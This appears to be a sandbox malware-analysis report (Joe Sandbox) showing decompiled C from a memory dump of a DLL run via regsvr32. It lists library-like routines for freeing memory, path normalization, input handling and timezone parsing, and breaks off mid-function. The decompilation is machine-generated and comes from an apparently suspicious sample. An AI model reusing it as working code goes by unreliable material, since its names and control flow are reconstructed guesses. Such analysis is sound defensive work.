Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22

Uniqueness

Uniqueness Score: -1.00%

Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x100045ff
0x10004605

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 100045FF

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0xf256d946
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}

0x10025931
0x1002593c
0x10025944
0x10025947
0x1002595b
0x10025965
0x10025976
0x1002597f
0x10025984
0x1002598e
0x10025996
0x10025999
0x100259a9
0x10025a44
0x10025a46
0x100259af
0x100259cd
0x100259da
0x100259dd
0x100259dd
0x100259ea
0x00000000
0x100259ec
0x100259f6
0x100259ff
0x00000000
0x10025a01
0x10025a02
0x10025a0e
0x00000000
0x10025a31
0x10025a3e
0x00000000
0x10025a3e
0x10025a0e
0x100259ff
0x100259cf
0x100259cf
0x100259cf
0x100259cf
0x100259cd
0x10025a4d
0x10025a52
0x00000000
0x00000000
0x00000000
0x10025967
0x1002596c
0x10025978
0x10025978
0x10025978
0x10025a59
0x10025a6a

APIs

__EH_prolog.LIBCMT ref: 10025931
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C

Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916

PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
CharUpperA.USER32(?), ref: 100259DD
FindFirstFileA.KERNEL32(?,?), ref: 100259F6
FindClose.KERNEL32(00000000), ref: 10025A02
lstrlenA.KERNEL32(?), ref: 10025A1F
lstrcpyA.KERNEL32(?,?), ref: 10025A3E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
String ID:
API String ID: 4080879615-0
Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90

Uniqueness

Uniqueness Score: -1.00%

Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

0x1002fe23
0x1002fe27
0x1002fe30
0x1003000b
0x00000000
0x1003000d
0x1002fe36
0x1002fe45
0x1002fe4d
0x1002fe65
0x1002fe75
0x00000000
0x00000000
0x00000000
0x00000000
0x1002fe87
0x1002fe87
0x1002fe8c
0x1002fe8f
0x1002fe98
0x1002fea2
0x1002fea5
0x1002feb3
0x1002fec9
0x1002fed0
0x1002fed3
0x1002fed7
0x1002feda
0x1002fedc
0x1002fedf
0x1002fee4
0x1002fee7
0x1002fef8
0x1002fefc
0x1002fefe
0x1002ff02
0x1002ff08
0x1002ff0b
0x1002ff13
0x1002ff13
0x1002ff0b
0x1002feef
0x1002feef
0x1002feef
0x1002ff1a
0x1002ff84
0x1002ff8a
0x1002ff8d
0x1002ff95
0x1002ff9b
0x1002ffa9
0x00000000
0x1002ffa9
0x1002ff8f
0x1002ff93
0x00000000
0x00000000
0x00000000
0x1002ff22
0x1002ff28
0x1002ff42
0x1002ff46
0x1002ff73
0x1002ff7a
0x1002ffaf
0x1002ffb5
0x00000000
0x1002ffb5
0x1002ff4a
0x1002ff50
0x1002ff53
0x00000000
0x00000000
0x1002ff58
0x1002ff5b
0x1002ff5e
0x00000000
0x00000000
0x1002ff60
0x1002ff65
0x1002ff6a
0x1002ff6c
0x00000000
0x1002ff6c
0x1002ff30
0x1002ff36
0x1002ff3b
0x00000000
0x1002ff3b
0x1002ff1a
0x1002ffb8
0x1002ffb8
0x1002ffba
0x1002ffc2
0x1002ffce
0x1002fff2
0x1002fffd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002ffd0
0x1002ffd0
0x1002ffd0
0x1002ffd3
0x1002ffe2
0x00000000
0x00000000
0x1002ffe6
0x1002ffed
0x1002fff0
0x00000000
0x00000000
0x00000000
0x1002fff0
0x00000000
0x10030010
0x10030010
0x10030010
0x00000000
0x10030010
0x1002ffc2

APIs

Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F

ScreenToClient.USER32 ref: 1002FEA5
GetKeyState.USER32 ref: 1002FF02
GetKeyState.USER32 ref: 1002FF4A
GetKeyState.USER32 ref: 1002FF84
KillTimer.USER32(?,0000E001), ref: 1002FFA9
IsWindow.USER32(?), ref: 1002FFF5

Strings

(, xrefs: 1002FEC9

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$ClientKillParentScreenTimerWindow
String ID: (
API String ID: 1540673551-3887548279
Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 10018E14 Relevance: 10.7, APIs: 7, Instructions: 212
timeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6(0x10042ccc);
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}

0x10018e14
0x10018e16
0x10018e1b
0x10018e22
0x10018e27
0x10018e2d
0x10018e30
0x10018e36
0x10018e39
0x10018e3f
0x10018e46
0x10018e58
0x10018e5a
0x10018e5f
0x10018f1d
0x10018f22
0x10018f24
0x10018f26
0x10018f27
0x10018f2d
0x10018f2d
0x10018f38
0x10018f3e
0x10018f41
0x00000000
0x10018f47
0x10018f4a
0x10018f50
0x10018f55
0x10018f58
0x10018f5d
0x10018f64
0x10018f66
0x10018f6f
0x10018f6f
0x10018f71
0x10018f71
0x10018f76
0x10018f7d
0x10018f9e
0x10018f9e
0x10018fa4
0x00000000
0x10018f7f
0x10018f7f
0x10018f84
0x10018f86
0x00000000
0x00000000
0x10018f88
0x10018f97
0x10018faa
0x10018fc6
0x10018fc8
0x10018fca
0x10018fdc
0x10018fdc
0x10018fe1
0x10018fe4
0x10018ffa
0x10018ffc
0x10018ffe
0x10019010
0x10019010
0x10019015
0x00000000
0x10019015
0x10019000
0x10019003
0x00000000
0x00000000
0x10019005
0x1001900a
0x00000000
0x1001900a
0x10018fcc
0x10018fcf
0x00000000
0x00000000
0x10018fd1
0x10018fd6
0x00000000
0x10018fd6
0x10018f7d
0x10018e6e
0x10018e6e
0x10018e75
0x10018e98
0x10018ea0
0x10018ea7
0x10018eae
0x10019018
0x1001901e
0x100190b6
0x100190bb
0x100190bb
0x10018eb6
0x10018ebc
0x10018ebd
0x10018ec1
0x10018ecf
0x10018ed7
0x10018edc
0x10018ee0
0x10018ee6
0x10018ee8
0x10018eef
0x10018eef
0x10018ef1
0x10018ef6
0x10018efd
0x10018f04
0x10018f04
0x10018f08
0x00000000
0x00000000
0x10018f1a
0x10018f1a
0x10019038
0x1001903b
0x1001907b
0x1001907b
0x1001907e
0x10019080
0x10019080
0x10019086
0x10019089
0x1001908e
0x10019090
0x100190ae
0x100190b3
0x10019092
0x1001909b
0x100190a3
0x100190a8
0x100190a8
0x00000000
0x10019090
0x1001903d
0x1001903f
0x10019044
0x10019048
0x10019055
0x10019055
0x10019057
0x10019059
0x00000000
0x00000000
0x10019050
0x10019052
0x00000000
0x00000000
0x10019054
0x10019054
0x10019054
0x1001905b
0x1001905e
0x00000000
0x00000000
0x10019060
0x10019068
0x10019075
0x10019075
0x10019077
0x10019079
0x00000000
0x00000000
0x10019070
0x10019072
0x00000000
0x00000000
0x10019074
0x10019074
0x10019074
0x00000000
0x10019075
0x10018e82
0x00000000
0x10018e88
0x10018e88
0x10018e8d
0x10018e8f
0x10018e91
0x10018e92
0x10018e97
0x00000000
0x10018e8f
0x10018e82

APIs

__lock.LIBCMT ref: 10018E27

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

_strlen.LIBCMT ref: 10018E99
_strncpy.LIBCMT ref: 10018ECF

Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D

GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
String ID:
API String ID: 634650903-0
Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

0x10032a30
0x10032a3c
0x10032a43
0x10032a45
0x10032a47
0x10032a47
0x10032a53
0x10032a55
0x10032a57
0x10032a57
0x10032a64
0x10032a6e
0x10032a71
0x10032a9d
0x10032a9f
0x10032ab0
0x10032aba
0x10032aba
0x10032a73
0x10032a90
0x10032a90
0x10032acd

APIs

GetKeyState.USER32 ref: 10032A3E
GetKeyState.USER32 ref: 10032A4E
GetFocus.USER32 ref: 10032A5E
GetDesktopWindow.USER32 ref: 10032A66
SendMessageA.USER32 ref: 10032A8A
SendMessageA.USER32 ref: 10032AA9
GetParent.USER32(00000000), ref: 10032AB2

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
